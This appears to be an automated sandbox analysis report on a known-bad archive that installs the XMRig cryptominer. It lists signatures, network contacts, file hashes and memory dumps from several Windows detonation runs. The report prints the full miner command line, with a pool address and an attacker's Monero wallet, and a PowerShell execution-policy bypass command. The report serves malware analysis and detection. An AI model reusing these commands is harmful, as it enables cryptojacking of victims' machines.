Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-25 15:43
Signatures
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:45
Platform
win11-20240426-en
Max time kernel
1795s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5036 wrote to memory of 3980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5036 wrote to memory of 3980 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.11:443 | tcp |
Files
memory/5036-0-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w3yhihft.fkb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5036-9-0x000001DE6FFD0000-0x000001DE6FFF2000-memory.dmp
memory/5036-10-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/5036-11-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/5036-12-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/5036-14-0x000001DE70590000-0x000001DE705A2000-memory.dmp
memory/5036-15-0x000001DE70470000-0x000001DE7047A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3980-46-0x0000021A99DF0000-0x0000021A99E10000-memory.dmp
memory/3980-47-0x0000021A9B5F0000-0x0000021A9B610000-memory.dmp
memory/3980-48-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/5036-49-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/5036-50-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp
memory/3980-51-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-53-0x0000021A9B630000-0x0000021A9B650000-memory.dmp
memory/3980-52-0x0000021A9B610000-0x0000021A9B630000-memory.dmp
memory/3980-54-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-55-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-56-0x0000021A9B610000-0x0000021A9B630000-memory.dmp
memory/3980-57-0x0000021A9B630000-0x0000021A9B650000-memory.dmp
memory/3980-58-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-59-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-60-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-61-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-62-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-63-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-64-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-65-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-66-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-67-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-68-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-69-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-70-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-71-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-72-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-73-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-74-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-75-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-76-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-77-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-78-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-79-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-80-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-81-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-82-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-83-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-84-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-85-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-86-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-87-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-88-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-89-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-90-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-91-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-92-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-93-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-94-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-95-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-96-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-97-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-98-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-99-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-100-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-101-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-102-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-103-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-104-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-105-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-106-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-107-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-108-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-109-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-110-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-111-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-112-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-113-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-114-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-115-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
memory/3980-116-0x00007FF7554D0000-0x00007FF756103000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:17
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1772s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4512 wrote to memory of 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4512 wrote to memory of 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4512-0-0x00007FFE96333000-0x00007FFE96334000-memory.dmp
memory/4512-5-0x000001B0C7E30000-0x000001B0C7E52000-memory.dmp
memory/4512-8-0x00007FFE96330000-0x00007FFE96D1C000-memory.dmp
memory/4512-9-0x000001B0E0630000-0x000001B0E06A6000-memory.dmp
memory/4512-10-0x00007FFE96330000-0x00007FFE96D1C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lmwpgql.fhr.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4512-25-0x00007FFE96330000-0x00007FFE96D1C000-memory.dmp
memory/4512-48-0x000001B0E03E0000-0x000001B0E03F2000-memory.dmp
memory/4512-61-0x000001B0C7E60000-0x000001B0C7E6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/600-90-0x000001C527670000-0x000001C527690000-memory.dmp
memory/4512-91-0x00007FFE96333000-0x00007FFE96334000-memory.dmp
memory/4512-92-0x00007FFE96330000-0x00007FFE96D1C000-memory.dmp
memory/600-93-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/4512-94-0x00007FFE96330000-0x00007FFE96D1C000-memory.dmp
memory/600-95-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-96-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-97-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-98-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-99-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-100-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-101-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-102-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-103-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-104-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-105-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-106-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-107-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-108-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-109-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-110-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-111-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-112-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-113-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-114-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-115-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-116-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-117-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-118-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-119-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-120-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-121-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-122-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-123-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-124-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-125-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-126-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-127-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-128-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-129-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-130-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-131-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-132-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-133-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-134-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-135-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-136-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-137-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-138-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-139-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-140-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-141-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-142-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-143-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-144-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-145-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-146-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-147-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-148-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-149-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-150-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-151-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-152-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-153-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-154-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-155-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
memory/600-156-0x00007FF7B6110000-0x00007FF7B6D43000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:30
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1756s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
